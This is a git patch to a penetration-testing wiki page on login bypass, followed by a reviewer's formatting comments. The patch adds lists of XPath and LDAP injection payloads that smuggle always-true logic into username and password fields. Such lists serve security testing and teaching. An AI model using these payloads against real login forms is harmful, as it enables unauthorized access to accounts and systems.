From 46617092f7e079cae7897ba130b16dbdeca3c8f7 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 26 Jun 2021 16:00:08 +0000 Subject: [PATCH] GitBook: [master] one page modified --- pentesting-web/login-bypass/README.md | 37 ++++++++++++++++++++++++--- 1 file changed, 33 insertions(+), 4 deletions(-) diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md index 955fd0aeb..dc9e6abd5 100644 --- a/pentesting-web/login-bypass/README.md +++ b/pentesting-web/login-bypass/README.md @@ -30,12 +30,41 @@ As the NoSQL Injections requires to change the parameters value, you will need t ### XPath Injection authentication bypass +[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)\*\*\*\* +```text +' or '1'='1 +' or ''=' +' or 1]%00 +' or /* or ' +' or "a" or ' +' or 1 or ' +' or true() or ' +'or string-length(name(.))<10 or' +'or contains(name,'adm') or' +'or contains(.,'adm') or' +'or position()=2 or' +admin' or ' +admin' or '1'='2 +``` -## +### LDAP Injection authentication bypass + +[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)\*\*\*\* + +```text +* +*)(& +*)(|(& +pwd) +*)(|(* +*))%00 +admin)(&) +pwd +admin)(!(&(| +pwd)) +admin))(|(| +``` -* [**XPath Injection**](../xpath-injection.md) -* [**LDAP Injection**](../ldap-injection.md) -
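Review bot: both added link lines end in a stray `\*\*\*\*` (right after `#authentication-bypass)` and `#login-bypass)`), which renders as four literal asterisks after the link; drop the escaped run so each line ends at the closing parenthesis. The two `text` blocks also copy lists that, by the link text itself, live at the linked anchors in `../xpath-injection.md` and `../ldap-injection.md`, so the copies here can drift from those pages; consider keeping only the links or stating which page is authoritative. In the LDAP block, fragments such as `pwd)` and `pwd))` sit on their own lines with nothing to say which form field each line belongs to, so a one-line legend above the block, or a visible separation of the paired values, would make the listing readable. The subject line "GitBook: [master] one page modified" also says nothing about the change; something naming the XPath and LDAP sections would make the history searchable.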